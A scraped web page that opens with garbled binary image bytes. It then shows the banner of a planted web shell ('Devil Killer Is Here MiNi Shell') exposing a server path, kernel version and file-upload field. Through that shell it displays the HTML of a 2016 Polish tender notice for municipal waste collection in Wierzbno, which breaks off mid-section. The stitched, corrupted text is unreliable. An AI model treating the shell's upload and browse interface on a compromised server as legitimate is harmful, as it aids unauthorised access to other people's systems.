JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161121/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161121/347742-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.wierzbno.bumsoft-2.pl' target='_blank'>www.wierzbno.bumsoft-2.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 347742 - 2016
              z dnia 2016-11-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wierzbno: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych  w gminie  Wierzbno<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Gminy w Wierzbnie, krajowy numer identyfikacyjny
              54968300000, ul.
              90 
              ,
              07111  
              Wierzbno, woj.
              mazowieckie, państwo
              Polska, tel.
              025 793 44 95, e-mail
              , faks
              025 793 45 72.
              <br />
              Adres strony internetowej (URL): www.gminawierzbno.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.wierzbno.bumsoft-2.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />Urząd Gminy w Wierzbnie 07-111Wierzbn 90</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych  w gminie  Wierzbno<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia realizowanego w wyniku przetargu jest odbieranie i zagospodarowanie wskazanych w dalszej części SIWZ odpadów komunalnych niesegregowanych (zmieszanych) i segregowanych od właścicieli nieruchomości 
zamieszkałych z następujących miejscowości Gminy Wierzbno: 
Adamów, Brzeźnik, Cierpięta, Czerwonka, Czerwonka-Folwark, Filipy, Helenów, Janówek, Jaworek, Józefy, Karczewiec, Kazimierzów, Koszewnica, Krypy, Las Jaworski, Majdan, Nadzieja, Natolin, Orzechów, Ossówno, Rąbież, Skarżyn, Soboń, Stary Dwór, Strupiechów, Sulki, Świdno, Wąsosze, Wierzbno, Wólka, Wyczółki, Wyględówek. 
Realizacja zamówienia ma przebiegać w sposób zapewniający osiągnięcie odpowiednich poziomów określonych w  rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.U.2012 r. poz.645) oraz osiągnięcie poziomu określonego w rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz.U.2012 r. poz. 676).
Zamówienie obejmuje odbiór całej masy odpadów komunalnych zarówno zmiesza- nych jak i gromadzonych w sposób selektywny, transport i unieszkodliwianie odpadów w instalacjach wskazanych w wyżej wymienionej uchwale Nr 211/2012 Sejmiku Województwa Mazowieckiego.
Wyposażenie nieruchomości zamieszkałych w worki do
zbierania odpadów komunalnych.
<br /><br /><b>II.5) Główny kod CPV: </b>90500000-2<br /><b> Dodatkowe kody CPV:</b>90511000-2,
                90512000-9,
                90513100-7,
                90533000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Określenie warunków: Wykonawca zobowiązany jest do spełnienia następujących wymagań: a)
posiadania zezwolenia na transport odpadów, o którym mowa w art. 41 ustawy z dnia 14 grudnia
2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 ze zm.) w zakresie transportu odpadów objętych
przedmiotem zamówienia, b) posiadania zezwolenie na przetwarzanie odpadów, o których mowa w
art. 41 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 ze zm.), w przypadku
gdy wykonawca zamierza prowadzić przetwarzanie odpadów we własnym zakresie. W przypadku gdy
Wykonawca zamierza przekazać odpady innemu podmiotowi w celu ich przetwarzania, powinien
zawrzeć umowę na wskazany zakres z podmiotem posiadającym zezwolenie w tym zakresie i
niezwłocznie dostarczyć Zamawiającemu kopię tej umowy. W przypadku gdy Wykonawca zamierza
przekazywać odpady innemu podmiotowi prowadzącemu przetwarzanie odpadów poza granicami
Rzeczypospolitej Polskiej, powinien zawrzeć umowę na wskazany zakres z podmiotem posiadającym
zezwolenie w tym zakresie wynikające z prawa kraju przeznaczenia, jeżeli jest wymagane, a
Wykonawca musi niezwłocznie dostarczyć kopię tej umowy; c) posiadania umowy z Regionalną
Instalacją do Przetwarzania Odpadów Komunalnych na przyjmowanie odbieranych od właścicieli
nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z
sortowania odpadów komunalnych, d) posiadania sprzętu niezbędnego do wykonywania przedmiotu
umowy, e) posiadania systemu monitorowania pracy sprzętu, wykorzystywanego do realizacji
przedmiotu zamówienia.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                W celu potwierdzenia warunku Wykonawca wykaże, że a) posiada wiarygodność finansową lub zdolność kredytową, b)jest ubezpieczony od
odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, co najmniej na kwotę 300 000,00 zł.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                W celu potwierdzenia warunku Wykonawca wykaże, że a) dysponuje specjalistycznym sprzętem, w tym co najmniej 1 samochodem 
specjalistycznym  bezpylnym o minimalnej kubaturze 20 m3  oraz minimum 1 
samochodem skrzyniowym o ładowności minimalnej 3,5 Mg, a także 1 pojazdem  
do odbioru odpadów typu hakowiec bramowiec, b)wykonał w okresie ostatnich 3 lat co najmniej 1 usługę odbioru odpadów komunalnych, wykonaną na rzecz właścicieli nieruchomości w sposób ciągły przez minimum 12 miesięcy, o masie łącznej nie mniejszej niż 600 Mg rocznie, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem jej wartości, przedmiotu, daty wykonania i podmiotu, na rzecz którego usługa została 
wykonana oraz załączeniem dowodów, że została wykonana należycie.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej,o której mowa w art.24 ust. 11 ustawy Prawo zamówień publicznych. Wraz ze złożeniem oświadczenia,wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 2.odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.5pkt 1 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 3.zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z
opłacaniem podatków, wystawionego nie wcześniej niż 3 m-ce przed upływem składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem
podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w
szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenia na raty zaległych
płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 4. zaświadczenia
właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego
Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z
opłaceniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3
miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że
Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z
ewentualnymi odsetkami lub grzywnami, szczególności uzyskał przewidziane prawem zwolnienie,
odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji
właściwego organu</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a) posiadania zezwolenia na transport odpadów, o którym mowa w art. 41 ustawy z dnia 14 grudnia
2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 ze zm.) w zakresie transportu odpadów objętych
przedmiotem zamówienia, b) posiadania zezwolenie na przetwarzanie odpadów, o których mowa w
art. 41 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 ze zm.), w przypadku
gdy wykonawca zamierza prowadzić przetwarzanie odpadów we własnym zakresie. W przypadku gdy
Wykonawca zamierza przekazać odpady innemu podmiotowi w celu ich przetwarzania, powinien
zawrzeć umowę na wskazany zakres z podmiotem posiadającym zezwolenie w tym zakresie i
niezwłocznie dostarczyć Zamawiającemu kopię tej umowy. W przypadku gdy Wykonawca zamierza
przekazywać odpady innemu podmiotowi prowadzącemu przetwarzanie odpadów poza granicami
Rzeczypospolitej Polskiej, powinien zawrzeć umowę na wskazany zakres z podmiotem posiadającym
zezwolenie w tym zakresie wynikające z prawa kraju przeznaczenia, jeżeli jest wymagane, a
Wykonawca musi niezwłocznie dostarczyć kopię tej umowy; c) posiadania umowy z Regionalną
Instalacją do Przetwarzania Odpadów Komunalnych na przyjmowanie odbieranych od właścicieli
nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z
sortowania odpadów komunalnych, d) posiadania sprzętu niezbędnego do wykonywania przedmiotu
umowy, e) posiadania systemu monitorowania pracy sprzętu, wykorzystywanego do realizacji
przedmiotu zamówienia.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">a)wykaz usług tożsamych lub podobnych do przedmiotu przetargu zrealizowanych
     w ostatnich 3 latach, a jeżeli okres prowadzenia działalności jest krótszy  za cały 
     ten okres z podaniem jej wartości, przedmiotu, daty wykonania i podmiotu, na  
     rzecz którego usługa została wykonana oraz dokumentów potwierdzających ich  
     należyte wykonanie 
  b)wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń technicznych 
    oraz środków transportu (w tym kubatura i ładowność) wraz z podstawą dyspono- 
    wania tymi zasobami 
 c) wykaz osób, które będą realizować zamówienie, wraz z
oświadczeniem , że sa one zatrudnione na umowę o prace wraz z dokumentami potwierdzającymi
zatrudnienie lub kopię umowy o pracę  Wykonawca przedstawia minimum wykaz 5 osób
zatrudnionych na umowę o pracę  załącznik nr 5 SIWZ d) dokument potwierdzający, że Wykonawca
jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z
przedmiotem niniejszego zamówienia, co najmniej na kwotę 300 000,00 zł. e) posiadania wpisu do
rejestru działalności regulowanej, o której mowa w art. 9b ustawy z dnia 13 września 1996r. o
utrzymaniu czystości i porządku w gminach (Dz. U. z 2016 r. poz. 250), prowadzonego przez Wójta
Gminy Miedzna, w zakresie objętym przedmiotem zamówienia, f) zezwolenie na transport odpadów,
o którym mowa w art. 41 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 ze
zm.) w zakresie transportu odpadów objętych przedmiotem zamówienia, g) posiadania zezwolenie na
przetwarzanie odpadów, o których mowa w art. 41 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.
U. z 2013 r., poz. 21 ze zm.), w przypadku gdy wykonawca zamierza prowadzić przetwarzanie
odpadów we własnym zakresie. W przypadku gdy Wykonawca zamierza przekazać odpady innemu
podmiotowi w celu ich przetwarzania, powinien zawrzeć umowę na wskazany zakres z podmiotem
posiadającym zezwolenie w tym zakresie i niezwłocznie dostarczyć Zamawiającemu kopię tej umowy.
W przypadku gdy Wykonawca zamierza przekazywać odpady innemu podmiotowi prowadzącemu
przetwarzanie odpadów poza granicami Rzeczypospolitej Polskiej, powinien zawrzeć umowę na
wskazany zakres z podmiotem posiadającym zezwolenie w tym zakresie wynikające z prawa kraju
przeznaczenia, jeżeli jest wymagane, a Wykonawca musi niezwłocznie dostarczyć kopię tej umowy; h)
umowa z Regionalną Instalacją do Przetwarzania Odpadów Komunalnych na przyjmowanie
odbieranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych
oraz pozostałości z sortowania odpadów komunalnych, i) posiadania sprzętu niezbędnego do
wykonywania przedmiotu umowy,</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Zamawiający żąda od Wykonawców wniesienia wadium.
    Kwota wadium wynosi 5.000 zł (słownie: pięć tysięcy).
2. Wadium może być wniesione w jednej lub kilku następujących formach:
    1) pieniądzu,
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo 
        - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
    3) gwarancjach bankowych,
    4) gwarancjach ubezpieczeniowych,
    5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt 2 
        ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
        Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240).
3. Wadium wnoszone w pieniądzu należy wpłacić na konto Zamawiającego -  
     79 9236 0008 0390 0853 2000 0220 w Powiatowym Banku Spółdzielczym w  
    Węgrowie Oddział w Wierzbnie.
4. Wadium może wnieść jeden z wykonawców występujących wspólnie lub może być 
    wystawione na wszystkich wykonawców składających ofertę wspólną. 
5. Wadium musi być wniesione przed upływem wyznaczonego terminu składania  
     ofert, tj. przed dniem 30.11.2016 r. godz. 9,00.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie kwota wadium znajdzie się na rachunku bankowym Zamawiającego.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
